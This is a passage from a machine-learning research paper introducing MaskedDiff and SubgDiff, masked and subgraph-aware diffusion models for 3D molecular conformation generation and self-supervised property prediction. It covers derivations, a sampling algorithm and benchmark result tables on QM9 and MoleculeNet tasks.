diffusion models on molecules propose to independently inject continuous Gaussian noise into the every node feature (Hoogeboom et al., 2022) or atomic coordinates of 3D molecular geometry (Xu et al., 2022; Zaidi et al., 2023). This however implicitly models each atom as a separate particle, neglecting the substructure in the molecules which plays a significant role in molecular representation learning (Yu & Gao, 2022; Wang et al., 2022a). As shown in Figure 1, the 3D geometric substructure contains crucial information about the properties, such as the equilibrium distribution, crystallization and solubility (Marinova et al., 2018). As a result, uniformly adding same-scale Gaussian noise to all atoms makes it difficult for the denoising network to capture the properties of the 3D molecules related to the substructure. So here we try to answer the previous question by training a DPM with the knowledge of substructures. Toward this goal, we first propose a general masked diffusion framework named MaskedDiff, adding different Gaussian noise to 3D molecular conformation. Specifically, instead of adding the same Gaussian noise to every atomic coordinate, MaskedDiff introduces a discrete binary distribution to the diffusion process, where a mask vector sampling from the distribution can be used to select a subset of the atoms to determine which substructure the noise should be added to at the current time step (Figure 2). MaskedDiff can unify many masked-related diffusion models in other domain (Alcaraz & Strodthoff, 2022; Lei et al., 2023). Despite the fact that MaskedDiff can be directly used for self-supervised learning, it cannot be employed for generative tasks due to the difficulty of determining the mask vector during generation. In order to make MaskedDiff usable for both molecular conformation generation and self-supervised representation learning, we design a novel subgraph diffusion model termed SUBGDIFF which incorporates a mask predictor (akin to a node classifier) in MaskedDiff during training that explicitly imposes the denoising network to capture the substructure information from the molecules. In SUBGDIFF, the substructure is concretized as the subgraph of the molecular graph. The mask predictor can also be used to generate the mask vector during molecule generation, thereby giving the generative ability to SUBGDIFF. With the ability to capture the substructure information from the noisy 3D molecular, the denoising networks tend to gain more representation power. It is made possible by the discrete distribution involved in the diffusion model, which, in contrast to conventional same-scale Gaussian models, captures the subgraph in the noisy graphs. These improvements enhance the performance of SUBGDIFF on molecular conformation generation and 3D molecular representation learning tasks. The experiments on molecular conformation generation and 3D molecular property prediction demonstrate the superior performance of our approach. The key contributions of this paper are as follows: (1) The paper proposes a novel general mask diffusion model framework MaskedDiff. This framework combines the continuous and discrete characteristics, thereby being capable of recovering many typical diffusion models. (2) A new diffusion model SUBGDIFF is designed to enhance the representation power of the DPM for molecular conformation generation via equipping the subgraph constraint in the diffusion process. SUBGDIFF can be used for molecular conformation generation and self-supervised representation learning. (3) The proposed method achieves superior performance on molecular conformation generation and 3D molecular property protection tasks compared to the typical continuous diffusion models. --- 1 Adapted with permission from Marinova et al. (2018). Copyright 2018 American Chemical Society. 2 RELATED WORK Diffusion models on graphs. The diffusion models on graphs can be mainly divided into two categories: continuous diffusion and discrete diffusion. Continuous diffusion applies a Gaussian noise process on each node or edge (Ingraham et al., 2019; Niu et al., 2020), including GeoDiff (Xu et al., 2022), EDM (Hoogeboom et al., 2022). Meanwhile, discrete diffusion constructs the Markov chain on discrete space, including Digress (Haefeli et al., 2022) and GraphARM (Kong et al., 2023a). However, it remains open to exploring fusing the discrete characteristic into the continuous Gaussian on graph learning, although a closely related work has been proposed for images and cannot be used for generation (Pan et al., 2023). Our work, SUBGDIFF, is the first masked diffusion model for graphs, combining discrete characteristics and the continuous Gaussian. Conformation generation. Various deep generative models have been proposed for conformation generation, including CVGAE (Mansimov et al., 2019), GraphDG (Simm & Hernandez-Lobato, 2020), CGCF (Xu et al., 2021a), CONFVAE (Xu et al., 2021b), CONFGF (Shi et al., 2021) and GEOMOL (Ganea et al., 2021). Recently, diffusion-based methods have shown competitive performance. Torsional Diffusion (Jing et al., 2022) raises a diffusion process on the hypertorus defined by torsion angles. However, it is not suitable as a self-supervised learning technique due to the lack of local information (length and angle of bonds). GEODiff (Xu et al., 2022) generates molecular conformation by doing a conventional diffusion model on atomic coordinates. However, these methods view the atoms as separate particles, without considering the critical dependence between atoms, especially the substructure. SSL for 3D molecular property prediction. There exist several works leveraging the 3D molecular conformation to boost the representation learning, including GeoSSL (Liu et al., 2023b), the denoising pretraining approach raised by Zaidi et al. (2023) and MoleculeSDE (Liu et al., 2023a), etc. However, those studies have not considered the molecular substructure in the pertaining. In this paper, we concentrate on how to boost the perception of molecular substructure in the denoising networks through the diffusion model. 3 PRELIMINARIES Notations. We use $I$ to denote the identity matrix with dimensionality implied by context. $\odot$ represents the element product and diag($s$) denotes the diagonal matrix with diagonal elements of the vector $s$. The topological molecular graph can be denoted as $G(V,E,X)$ where $V$ is the set of nodes, $E$ is the set of edges, $X$ is the node feature matrix, and its corresponding 3D Conformational Molecular Graph is represented as $G_{3D}(G,R)$, where $R = [R_1, \cdots, R_{|V|}] \in \mathbb{R}^{|V| \times 3}$ is the set of 3D coordinates of atoms. DDPM. Denoising diffusion probabilistic models (DDPM) (Ho et al., 2020) is a typical diffusion model (Sohl-Dickstein et al., 2015) which consists of a diffusion (aka forward) and a reverse process. In the setting of molecular conformation generation, the diffusion model adds noise on the 3D molecular coordinates $R$ (Xu et al., 2022). Forward Process. Given the fixed variance schedule $\beta_1, \beta_2, \cdots, \beta_T$, the posterior distribution $q(R^{1:T}|R^0)$ that is fixed to a Markov chain can be written as $$q(R^{1:T}|R^0) = \prod_{t=1}^{T} q(R^t|R^{t-1}), \quad q(R^t|R^{t-1}) = \mathcal{N}(R^t, \sqrt{1 - \beta_t}R^{t-1}, \beta_t I).$$ To simplify notation, we consider the diffusion on single atom coordinate $R_v$ and omit the subscript $v$ to get the general notion $R$ throughout the paper. Let $\alpha_t = 1 - \beta_t$, $\bar{\alpha}_t = \prod_{i=1}^{t}(1 - \beta_i)$, and then the sampling of $R^t$ at any time step $t$ has the closed form: $q(R^t|R^0) = \mathcal{N}(R^t, \sqrt{\bar{\alpha}_t}R^0, (1 - \bar{\alpha}_t)I)$. Reverse Process and Training. The reverse process is defined as a Markov chain starting from a Gaussian distribution $p(R^T) = \mathcal{N}(R^T; 0, I)$: $$p_\theta(R_{0:T}) = p(R^T) \prod_{t=1}^{T} p_\theta(R^{t-1}|R^t); \quad p_\theta(R^{t-1}|R^t) = \mathcal{N}(R^{t-1}; \mu_\theta(R^t, t), \sigma_t),$$ where $\sigma_t = \frac{1 - \bar{\alpha}_t}{\bar{\alpha}_t} \beta_t$ denote time-dependent constant. In DDPM, $\mu_\theta(R^t, t)$ is parameterized as $\mu_\theta(R^t, t) = \frac{1}{\bar{\alpha}_t}(R^t - \frac{\beta_t}{\sqrt{1 - \bar{\alpha}_t}}\epsilon_\theta(R^t, t))$ and $\epsilon_\theta$, i.e., the denoising network, is parameterized by a neural network where the inputs are $R^t$ and time step $t$. The training objective of DDPM is: $$L_{\text{simple}}(\theta) = \mathbb{E}_{t,R^0,\epsilon}[\|\epsilon - \epsilon_\theta(\sqrt{\alpha_t} R^0 + \sqrt{1-\alpha_t}\epsilon, t)\|^2], \quad \epsilon \sim \mathcal{N}(0, I).$$ (3) **Sampling.** After training, samples are generated through the reverse process $p_\theta(R^{0:T})$. Specifically, $R^T$ is first sampled from $\mathcal{N}(0, I)$, and $R^t$ in each step is predicted as follows, $$R^{t-1} = \frac{1}{\sqrt{\alpha_t}} (R^t - \frac{1-\alpha_t}{\sqrt{1-\alpha_t}} \epsilon_\theta(R^t, t)) + \sigma_t z, \quad z \sim \mathcal{N}(0, I).$$ (4) ## 4 METHODOLOGY Directly using the typical diffusion model on atomic coordinates of 3D molecular means each atom is viewed as an independent single data point. However, the subgraph plays an important role in the molecular generation (Jin et al., 2020) and representation learning (Zang et al., 2023). Therefore, ignoring connections between nodes may hurt the denoising network’s ability to capture molecular substructure. Here, we propose to involve a mask operation in each diffusion step, driving a new masked diffusion for 3D molecular representation learning. Further, we also include the mask predictor and reset the state of the Markov Chain to be an expectation of mask distribution, leading to a new diffusion model SUBGDIFF for molecular generation and representation. ### 4.1 AN IMPORTANT LEMMA FOR DIFFUSION MODEL According to (Sohl-Dickstein et al., 2015; Ho et al., 2020), the diffusion model is trained by optimizing the variational bound on the negative log-likelihood $-\log p_\theta(R^0)$, in which the tricky terms are $L_{t-1} = D_{KL}(q(R^{t-1}|R^t, R^0)||p_\theta(R^{t-1}|R^t))$, $T \geq t > 1$. Here we provide a lemma that tells us the posterior distribution $q(R^{t-1}|R^t, R^0)$ used in the training and sampling algorithms of the diffusion model can be determined by $q(R^t|R^{t-1}, R^0)$, $q(R^{t-1}|R^0)$. Formally, we have **Lemma 4.1** Assume the forward and reverse processes of the diffusion model are both Markov chains. Given the forward Gaussian distribution $q(R^t|R^{t-1}, R^0) = \mathcal{N}(R^t; \mu_1 R^{t-1}, \sigma_1^2 I)$, $q(R^{t-1}|R^0) = \mathcal{N}(R^{t-1}; \mu_2 R^0, \sigma_2^2 I)$ and $\epsilon_0 \sim \mathcal{N}(0, I)$, the distribution $q(R^{t-1}|R^t, R^0)$ is $$q(R^{t-1}|R^t, R^0) \propto \mathcal{N}(R^{t-1}; \frac{1}{\mu_1} (R^t - \frac{\sigma_1^2}{\sqrt{\mu_1^2 \sigma_2^2 + \sigma_1^2}} \epsilon_0), \frac{\sigma_1^2 \sigma_2^2}{\mu_1^2 \sigma_2^2 + \sigma_1^2} I).$$ (5) Parameterizing $p_\theta(R^{t-1}|R^t)$ in the reverse process as $\mathcal{N}(R^{t-1}; \frac{1}{\mu_1} (R^t - \frac{\sigma_1^2}{\sqrt{\mu_1^2 \sigma_2^2 + \sigma_1^2}} \epsilon_\theta(R^t, t)), \frac{\sigma_1^2 \sigma_2^2}{\mu_1^2 \sigma_2^2 + \sigma_1^2} I)$, the training objective of the DPM can be written as $$L(\theta) = \mathbb{E}_{t,R^0,\epsilon}[\frac{\sigma_1^2}{2\mu_1^2 \sigma_2^2} \|\epsilon - \epsilon_\theta(\mu_1 \mu_2 R^0 + \sqrt{\mu_1^2 \sigma_2^2 + \sigma_1^2} \epsilon, t)\|^2],$$ (6) and the sampling (reverse) process is $$R^{t-1} = \frac{1}{\mu_1} (R^t - \frac{\sigma_1^2}{\sqrt{\mu_1^2 \sigma_2^2 + \sigma_1^2}} \epsilon_\theta(R^t, t)) + \frac{\sigma_1 \sigma_2}{\sqrt{\mu_1^2 \sigma_2^2 + \sigma_1^2}} z, \quad z \sim \mathcal{N}(0, I).$$ (7) The proof of the lemma can be found in the Appendix. Once we get the variables $(\mu_1, \sigma_1, \mu_2, \sigma_2)$, we can directly obtain the training objective and sampling process via lemma 4.1, which will help the design of new diffusion models. ### 4.2 MASKED DIFFUSION MODEL Let us focus on the typical DDPM. Using reparameterization trick, we have $R^t_v = \sqrt{1-\beta_t} R^{t-1}_v + \sqrt{\beta_t} \epsilon_{t-1}$, $\forall v \in V$, in which the Gaussian noise $\epsilon_{t-1}$ is injected to every atom. Moreover, the training objective in equation 3 shows that the denoising networks would always predict a Gaussian noise for all atoms. Neither the diffusion nor denoising process of DDPM does not take into account the substructure of the molecule. Instead, we propose **MaskedDiff**, where a mask vector $s_t = [s_{t_1}, \cdots, s_{t_{|V|}}]^T \in \{0, 1\}^{|V|}$ is sampled from a discrete distribution $p_{s_t}(S)$ to select a subset of the atoms to determine which atoms will be added noise at step $t$. In molecular graphs, the discrete mask distribution $p_{s_t}(S)$ is equivalent to ![Figure 3: The Markov Chain of MaskedDiff is a lazy Markov Chain.](image-url) the subgraph distribution, defined over a predefined sample space \( \chi = \{G_{\text{sub}}^i\}_{i=1}^{N} \), where each sample is a connected subgraph extracted from \( G \). Further, the pre-defined distribution \( p_{s_i}(S) \) should keep the selected connected subgraph to cohere with the molecular substructures. Here, we adopt a Torsional-based decomposition methods (Jing et al., 2022) (subsec. 4.3.3). Thus, the state transition of MaskedDiff can be formulated as (Figure 3): \[ R_v^t = \sqrt{1 - \beta_t} R_v^{t-1} + \sqrt{\beta_t} \epsilon_{t-1} \] if \( s_{tv} = 1 \), otherwise \( R_v^t = R_v^{t-1} \), which can be rewritten as \[ R_v^t = \sqrt{1 - s_{tv} \beta_t} R_v^{t-1} + \sqrt{s_{tv} \beta_t} \epsilon_{t-1}. \] The posterior distribution \( q(R^{1:T}|R^0) \) can be expressed as matrix form: \[ q(R^{1:T}|R^0) = \prod_{t=1}^{T} q(R^t|R^{t-1}); \quad q(R^t|R^{t-1}) = N(R^t, \sqrt{1 - \beta_t \text{diag}(s_t)} R^{t-1}, \beta_t \text{diag}(s_t) I). \] (8) To simplify the notation, we consider the diffusion on single node \( v \in G_{3D} \) and omit the subscript of coordinate \( R_v^t \) and \( s_{tv} \) to get the notion \( R^t \) and \( s_t \). By defining \( \gamma_t = 1 - s_t \beta_t, \gamma_t' = \prod_{i=1}^{t} (1 - s_i \beta_i) \), the closed form of sampling \( R^t \) from \( R^0 \) is \[ q(R^t|R^0) = N(R^t, \sqrt{\gamma_t} R^0, (1 - \gamma_t) I). \] By Lemma 4.1, with \( \mu_1 = \sqrt{1 - s_t \beta_t}, \sigma_1 = \sqrt{s_t \beta_t}, \mu_2 = \sqrt{\gamma_t - 1}, \sigma_2 = \sqrt{1 - \gamma_t - 1} \), the training objective of MaskedDiff is: \[ L(\theta) = E_{t,R^0,s} \left[ \frac{s_t \beta_t}{2(1 - s_t \beta_t)(1 - \gamma_t)} \| e - \epsilon_\theta(\sqrt{\gamma_t} R^0 + \sqrt{(1 - \gamma_t)} \epsilon_t, t, G) \|_2^2 \right]. \] (9) It is clear that if \( s_t = 0 \), \( L(\theta) = 0 \), which means that this node \( v \) will not be trained in time step \( t \). Therefore, the \( s_t \) also determines the substructure selected in time step \( t \). One drawback of MaskedDiff is that it cannot be directly employed in sampling since it is unable to obtain \((s_1, s_2, \cdots, s_T)\) to derive the \( \sigma_1 \) and \( \sigma_2 \) in equation 7. The discussion with related work (MDM (Pan et al., 2023), MDSM (Lei et al., 2023) and SSSD (Alcaraz & Strodthoff, 2022)) is deferred to Appendix A. ### 4.3 SUBGDIFF: A DIFFUSION MODEL FOR REPRESENTATION LEARNING AND CONFORMATION GENERATION In this section, we propose a novel diffusion model called SUBGDIFF for self-supervised representation learning and conformation generation. Inheriting from MaskedDiff, SUBGDIFF adopts the mask vector to embed the substructure into the denoising network \( \epsilon_\theta \). However, the main problem is that MaskedDiff cannot be used for generations. To solve the problem, SUBGDIFF applies multiple techniques to make it better for generation. #### 4.3.1 MASK ESTIMATION Recall the forward process in MaskedDiff, only a subgraph (substructure) in the molecular graph is chosen to diffuse at each time step. Correspondingly, during the reverse process, the mask is used to determine which subgraph needs to be denoised. This means that the sampling process will prioritize the subgraphs that are selected by the mask, which is also reflected by equation 7 (\( \sigma_1 \) and \( \sigma_2 \)). However, the mask series \((s_1, s_2, \cdots, s_T)\) cannot be accessed during sampling. This uncertainty will bring the tribulation to make the denoising network capture the substructure. To estimate the mask series, SUBGDIFF uses a mask predictor to infer \( s_t \) and adapt an expectation state to eliminate the effect of \((s_1, \cdots, s_{t-1})\). **Mask Predictor.** Given the current time step \( t \) in sampling, we need to infer the pivotal mask (subgraph) \( s_t \) to highlight the subgraph of \( G_{3D}(X, R^t) \) that will be denoised to recover \( R^{t-1} \). Thus, we first introduce a mask predictor to estimate the mask vector \( s_t \) during training (the theoretical motivation can be seen in Appendix). Consequently, the training objective of SUBGDIFF is: \[ L_{\text{simple}}(\theta, \vartheta) = E_{t,R^0,s_t,e} [\|\text{diag}(s_t)(e - \epsilon_\theta(G, R^t, t))\|^2 + \lambda \text{BCE}(s_t, s_{\vartheta}(G, R^t, t))], \] (10) where \( \text{BCE}(s_t, s_{\vartheta}) = s_t \log s_{\vartheta}(G, R^t, t) + (1 - s_t) \log (1 - s_{\vartheta}(G, R^t, t)) \) is the Binary Cross Entropy loss and \( \lambda \) is the weight used for the trade-off. The mask predictor \( s_{\vartheta} \) is implemented as a node classifier with \( G_{3D}(G, R^t) \) as input and shares a molecule encoder with \( \epsilon_\theta \), thereby explicitly imposing the denoising network to capture the substructure information from molecules. Eventually, the \( s_{\vartheta} \) can be used to infer the mask vector \( \hat{s}_t = s_{\vartheta}(G, R^t, t) \) during sampling. More importantly, this BCE loss explicitly imposes the denoising network to capture the substructure information from the molecules. **Expectation State Diffusion.** As mentioned above, the MaskedDiff cannot be used for sampling due to the unknown mask series \((s_1, s_2, \cdots, s_t)\). We have designed a mask predictor to infer \( s_t \). However, using another predictor to infer \((s_1, \cdots, s_{t-1})\) solely from \(R^t\) becomes challenging due to the intricate modulation of noise introduced in \(R^t\) through multi-step Gaussian processes. This complex modulation of noise in \(R^t\) also heightens the challenge of predicting \(s_t\), a critical factor in enhancing the denoising network’s ability to discern substructures during self-supervised learning. Recall the forward process of MaskedDiff. The state \(R^{t-1} = \sqrt{\gamma_{t-1}} R^0 + \sqrt{(1 - \gamma_{t-1})} \epsilon_0 \propto (s_1, \cdots, s_{t-1}, \epsilon_0)\). To eliminate the effect of mask series, we use the mean state \(E_{s_{1:t-1}} R^{t-1}\) to estimate the state \(R^{t-1}\). Assume each node \(v \in V, s_{tv} \sim Bern(p)\) (i.i.d. w.r.t. \(t\)), the \(E_{s_{1:t-1}} R^{t-1}\) can be formulated as: \[ E_{s_{1:t-1}} R^{t-1} = \sqrt{\alpha_t} R^0 + p \left( \sum_{i=1}^{t} \frac{\bar{\alpha}_i}{\alpha_i} \beta_i \right)^{1/2} \epsilon_0, \] where \(\alpha_i := (p\sqrt{1 - \beta_i} + 1 - p)^2\) and \(\bar{\alpha}_i := \prod_{j=1}^{i} \alpha_j\) are general form of \(\alpha_j\) and \(\bar{\alpha}_j\) in DDPM (\(p = 1\)), respectively. This estimation is reasonable since the expectation \(E_{s_{1:t-1}} R^{t-1}\) is like a cluster center of \(R^{t-1}\), which can represent the \(R^{t-1}\) properly. Meanwhile, using expectation is beneficial to reduce the complexity of \(R^t\) for predicting the mask \(s_t\) during training. This will improve the denoising network to perceive the substructure when we use the diffusion model for pretraining. Eventually, we get a new forward process, in which, state 0 to state \(t-1\) use the \(E_{s_{1:t-1}} R^{t-1}\) and state \(t\) remains as MaskedDiff. Formally, we have \(q(R^t | R^{t-1}) = N(R^t; \sqrt{1 - s_t \beta_t} R^{t-1}, (s_t \beta_t) I)\) and \(q(R^{t-1} | R^0) = q(E R^{t-1} | R^0) = N(E R^{t-1}; \prod_{i=1}^{t-1} \sqrt{\alpha_i} R^0, p^2 \sum_{i=1}^{t-1} \prod_{j=i+1}^{t-1} \alpha_j \beta_j I)\). From Lemma 4.1, the training objective we can use equation 10 and the sampling process is: \[ R^{t-1} = \frac{1}{\sqrt{1 - s_t \beta_t}} R^t - \frac{s_t \beta_t}{\sqrt{1 - s_t \beta_t}} \hat{s}_t \beta_t + (1 - s_t \beta_t) p^2 \sum_{i=1}^{t-1} \frac{\bar{\alpha}_{i-1}}{\alpha_i} \beta_i \epsilon_0(R^t, t) + \sigma_t z, \] where \(\hat{s}_t = s_\theta(R^t, t)\) and \(\sigma_t = \hat{s}_t \beta_t p^2 \sum_{i=1}^{t-1} \frac{\bar{\alpha}_{i-1}}{\alpha_i} \beta_i / (\hat{s}_t \beta_t + p^2 (1 - \hat{s}_t \beta_t) \sum_{i=1}^{t-1} \frac{\bar{\alpha}_{i-1}}{\alpha_i} \beta_i)\). ### 4.3.2 k-STEP SAME-MASK DIFFUSION Although we can successfully use MaskedDiff for sampling with Exceptional state and mask predictor, optimizing the mask predictor with equation 10 is still not trivial. To be specific, the mask predictor should be capable of perceiving the sensible noise change between time steps \(t-1\) and \(t\). However, the noise scale \(\beta_t\) is relatively small when \(t\) is small, especially if the diffusion step is larger than a thousand. As a result, it is difficult to precisely predict the mask. To reduce the complexity of the mask series \((s_1, s_2, \cdots, s_T)\) and accumulate more noise on the same subgraph, SubgDiff generalizes the one-step mask sampling to \(k\)-step mask sampling (Figure 5 in Appendix), in which the selected subgraph will be continuously diffused \(k\) steps. After that, the difference between the selected and unselected parts will be distinct enough to help the mask predictor perceive it. The forward process of \(k\)-step Same-mask diffusion can be written as \((t > k, k \in \mathbb{N})\): \[ q(R^t | R^{t-k}) = N(R^t; \sqrt{\prod_{i=t-k+1}^{t} (1 - s_{t-k+1} \beta_i)} R^{t-k}, (1 - \prod_{i=t-k}^{t} (1 - s_{t-k+1} \beta_i)) I). \] ### 4.3.3 SubgDiff With \(k\)-step same mask and mask estimation techniques, we propose a novel diffusion model called SubgDiff. SubgDiff divides the entire diffusion step \(T\) into \(T/k\) diffusion intervals. In each interval \([ki, k(i+1)]\), the mask vectors \(\{s_j\}_{j=ki+1}^{k(i+1)}\) are equal to \(s_{ki+1}\). To eliminate the effect of \( \{s_{ik+1} | i = 1, 2, \ldots\} \) and obtain the generative ability, SubgDiff also adopts the expectation state at the split time step \( \{ik | i = 1, 2, \ldots\} \), that is, gets the expectation of \( \mathbb{E}R^{ik} \) at step \( ik \) w.r.t. \( s_{ik+1} \). We therefore propose a new two-phase diffusion process. In the first phase, the state 1 to state \( k[t/k] \) use the expectation state diffusion, while in the second phase, state \( k([t/k]) + 1 \) to state \( t \) use the \( k \)-step same mask diffusion. The state transition refers to Figure 4. With \( m := [t/k] \), the two phases can be formulated as follows, **Phase I:** Step \( 0 \rightarrow k[t/k]: \mathbb{E}s_{1:k,m} R^{km} = \sqrt{\alpha_m} R^0 + p \sqrt{\sum_{l=1}^{m} \frac{\alpha_l}{\alpha_1} (1 - \prod_{i=(l-1)k+1}^{lk} (1 - \beta_i))} \epsilon_0 \), where \( \alpha_j = (p \sqrt{\prod_{i=(j-1)k+1}^{jk} (1 - \beta_i)} + 1 - p)^2 \) is a general forms of \( \alpha_j \) in equation 11 (in which case \( k = 1 \)) and \( \bar{\alpha}_t = \prod_{i=1}^{t} \alpha_i \). In the rest of the paper, \( \alpha_j \) denotes the general version without a special statement. Actually, the \( \mathbb{E}s_{1:k,m} R^{km} \) only calculate the expectation of random variable \( \{s_{ik+1} | i = 1, 2, \ldots\} \). **Phase II:** Step \( k[t/k] + 1 \rightarrow t \): The phase is a \((t - km)\)-step same mask diffusion. \( R^t = \sqrt{\prod_{i=k+1}^{t} (1 - \beta_i s_{km+1})} \mathbb{E}s_{1:k,m} R^{km} + \sqrt{1 - \prod_{i=k+1}^{t} (1 - \beta_i s_{km+1})} \epsilon_{km} \). Let \( \gamma_i = 1 - \beta_i s_{km+1} \), \( \gamma_t = \prod_{i=1}^{t} \gamma_i \), and \( \bar{\gamma}_t = \prod_{i=1}^{t} \gamma_i \), we can drive the single-step state transition: \[ q(R^t | R^{t-1}) = N(R^t; \sqrt{\gamma_t} R^{t-1}, (1 - \gamma_t)I) \] and \[ q(R^{t-1} | R^t) = N(R^{t-1}; \sqrt{\gamma_{t-1}} \bar{\gamma}_m R^0, \left( \frac{\gamma_{t-1}}{\gamma_m} \right)^2 \sum_{i=1}^{m} \frac{\alpha_m}{\alpha_i} (1 - \beta_{i(t-1)}) + 1 - \frac{\gamma_{t-1}}{\gamma_m} I). \] Then we can obtain \( \mu_1, \sigma_1, \mu_2, \sigma_2 \) in Lemma 4.1. Thus, the training objective of SubgDiff is: \[ L_{\text{simple}}(\theta, \varphi) = \mathbb{E}_{r,R^0,s,t}[\|\text{diag}(s_t)(\epsilon - e_\theta(G, R^t, t))\|^2 - \lambda \text{BCE}(s_t, s_\varphi(G, R^t, t))], \] where \( R^t \) can be calculated by equation 14. Because \( s_\varphi \) shares the encoder with \( e_\theta \), when using this objective for pretraining, \( e_\theta \) can be effectively trained to capture the substructure information. **Sampling.** The sampling process does not fully correspond to the forward process. Although the forward process uses the expectation state w.r.t \( s \), we can only update the mask \( \hat{s}_t \) when \( t = ik, i = 1, 2, \ldots \). Eventually, the sampling process is shown below, \[ R^{t-1} = \frac{1}{\sqrt{\gamma_t}} \left( \frac{1}{\sqrt{\gamma_t}} \sum_{i=1}^{m} \frac{\alpha_i}{\alpha_1} (1 - \beta_{i(t-1)}) + 1 - \frac{\gamma_{t-1}}{\gamma_m} \right) + \hat{s}_{k[t/k]+1} \epsilon_\theta(R^t, t) \] \[ + \sqrt{\gamma_t} \sum_{i=1}^{m} \frac{\alpha_i}{\alpha_1} (1 - \beta_{i(t-1)}) + 1 - \frac{\gamma_{t-1}}{\gamma_m} z, \] where \( z \sim N(0, I) \), \( m = [t/k] \) and \( \hat{s}_{k[t/k]+1} = s_\varphi(G, R^{km+1}, km + 1) \). It is clear that the subgraph selected by \( \hat{s}_{km+1} \) will be generated preferentially. The mask predictor can be viewed as a discriminator of important subgraphs, indicating the optimal subgraph should be recovered in the next \( k \) steps. After the key subgraph (substructure) is generated properly, the model can gently fine-tune the rest atoms (cf. the video in supplementary material). This subgraph diffusion would intuitively increase the robustness and generalization of the generation process, which is also verified by the experiments in sec. 5.2. While the DDPM (or GeoDiff) generates the atomic coordinates altogether, which is sub-optimal since some parts of the molecule shouldn’t be revised after well-generated. The training and sampling algorithms of SubgDiff are summarized in Alg. 1 and Alg. 2. **Algorithm 2:** Sampling from SubgDiff Sample \( R^T \sim N(0, I) \) for \( i = T \) to 1 do \( z \sim N(0, I) \) if \( i > 1 \), else \( z = 0 \) If \( \%k == 0 \) or \( t == T \): \( s \leftarrow s_\varphi(G, R^t, t) \) \( \epsilon \leftarrow e_\theta(G, R^t, t) \) ▷ Posterior \( R^{t-1} \leftarrow \) equation 16 ▷ sampling end return \( R^0 \) ### 4.4 Mask distribution As mentioned in Subsection 4.2, the subgraphs (mask vectors) sampled from the mask distribution should be connected. In this paper, we predefine the mask distribution to be a discrete distribution, with sample space \( \chi = \{G_{\text{sub}}^i\}_{i=1}^N \), and \( p_t(S = G_{\text{sub}}^i) = 1/N, t > 1 \), where \( G_{\text{sub}}^i \) is the subgraph split by the Torsional-based decomposition methods (Jing et al., 2022). The decomposition approach will cut off one torsional edge in a 3D molecule to make the molecule into two components, each of which contains at least two atoms. The two components are represented as two complementary mask vectors (i.e. \( s' + s = 1 \)). Thus \( n \) torsional edges in \( G_{3D}^i \) will generate \( 2n \) subgraphs. Finally, for each atom \( v \), the \( s_{tv} \sim \text{Bern}(0.5) \), i.e. \( p = 0.5 \) in SubgDiff. 5 EXPERIMENTS We conducted experiments to address the following two questions: 1) Can substructure improve the representation ability of the denoising network during self-supervised learning? 2) Can the \textsc{SubgDiff} outperform the conventional diffusion model in conformation generation? For the first question, we employ \textsc{SubgDiff} as a denoising pretraining task. For the second question, we compare \textsc{SubgDiff} with \textsc{GeoDiff}. We will pay more attention to the first question. Table 1: Results on 12 quantum mechanics prediction tasks from QM9. We take 110K for training, 10K for validation, and 11K for testing. The evaluation is mean absolute error (MAE), and the best and the second best results are marked in bold and underlined, respectively. The backbone is \textsc{SchNet}. | Pretraining | Alpha ↓ | Gap ↓ | HOMO ↓ | LUMO ↓ | Mu ↓ | Cv ↓ | G298 ↓ | H298 ↓ | R2 ↓ | U298 ↓ | U0 ↓ | Zpve ↓ | |----------------------|---------|-------|--------|--------|------|------|--------|--------|------|--------|------|-------| | Random init | 0.070 | 50.59 | 32.53 | 26.33 | 0.029| 0.032| 14.68 | 14.85 | 0.122| 14.70 | 14.44 | 1.698 | | Supervised | 0.070 | 51.34 | 32.62 | 27.61 | 0.030| 0.032| 14.08 | 14.09 | 0.141| 14.13 | 13.25 | 1.727 | | Type Prediction | 0.084 | 56.94 | 34.35 | 30.66 | 0.036| 0.038| 18.79 | 19.29 | 0.201| 19.29 | 18.86 | 2.001 | | Angle Prediction | 0.084 | 57.01 | 37.57 | 30.92 | 0.037| 0.034| 15.81 | 15.89 | 0.164| 16.43 | 15.76 | 1.850 | | 3D InfoGraph | 0.076 | 53.33 | 33.92 | 28.55 | 0.030| 0.032| 15.97 | 16.28 | 0.117| 16.17 | 15.96 | 1.666 | | GeoSSL-RR | 0.073 | 52.57 | 34.44 | 28.41 | 0.033| 0.038| 15.74 | 16.11 | 0.194| 15.58 | 14.76 | 1.804 | | GeoSSL-InfoNCE | 0.075 | 53.00 | 34.29 | 27.03 | 0.029| 0.033| 15.67 | 15.53 | 0.125| 15.79 | 14.94 | 1.675 | | GeoSSL-EBM-NCE | 0.073 | 52.86 | 33.74 | 28.07 | 0.031| 0.032| 14.02 | 13.65 | 0.121| 13.70 | 13.45 | 1.677 | | MoleculeSDE | 0.062 | 47.74 | 28.02 | 24.60 | 0.028| 0.029| 13.25 | 12.70 | 0.120| 12.68 | 12.93 | 1.643 | | Ours | **0.054** | **44.88** | **25.45** | **23.75** | **0.027** | **0.028** | **12.03** | **11.46** | **0.110** | **11.32** | **11.25** | **1.568** | 5.1 MOLECULAR PROPERTY PREDICTION This experiment aims to verify whether the introduced mask in the diffusion can enhance the denoising network to perceive the structure of 3D molecules. Table 2: Results for 2D molecular property prediction tasks (with 2D topology only). We report the mean (and standard deviation) ROC-AUC of three random seeds with scaffold splitting for each downstream task. The backbone is \textsc{GIN}. The best and second best results are marked bold and underlined, respectively. | Pre-training | BBBP ↑ | Tox21 ↑ | ToxCast ↑ | Sider ↑ | ClinTox ↑ | MUV ↑ | HIV ↑ | Bace ↑ | Avg ↑ | |----------------------|--------|---------|-----------|---------|-----------|-------|-------|-------|-------| | (random init) | 68.1±0.59 | 75.3±0.22 | 62.1±0.19 | 57.0±1.33 | 83.7±2.93 | 74.6±2.35 | 75.2±0.70 | 76.7±2.51 | 71.60 | | AttrMask | 65.0±2.36 | 74.8±0.25 | 62.9±0.11 | 61.2±0.12 | 87.7±1.19 | 73.4±2.02 | 76.8±0.53 | 79.7±0.33 | 72.68 | | ContextPred | 65.7±0.62 | 74.2±0.06 | 62.5±0.31 | 62.2±0.59 | 77.2±0.88 | 75.3±1.57 | 77.1±0.86 | 76.0±2.08 | 71.28 | | InfoGraph | 67.5±0.11 | 73.2±0.43 | 63.7±0.50 | 59.9±0.30 | 76.5±1.07 | 74.1±0.74 | 75.1±0.99 | 77.8±0.88 | 70.96 | | MolCLR | 66.6±1.89 | 73.0±0.16 | 62.9±0.38 | 57.5±1.77 | 86.1±0.95 | 72.5±2.38 | 76.2±1.51 | 71.5±3.17 | 70.79 | | 3D InfoMax | 68.3±1.12 | 76.1±0.18 | 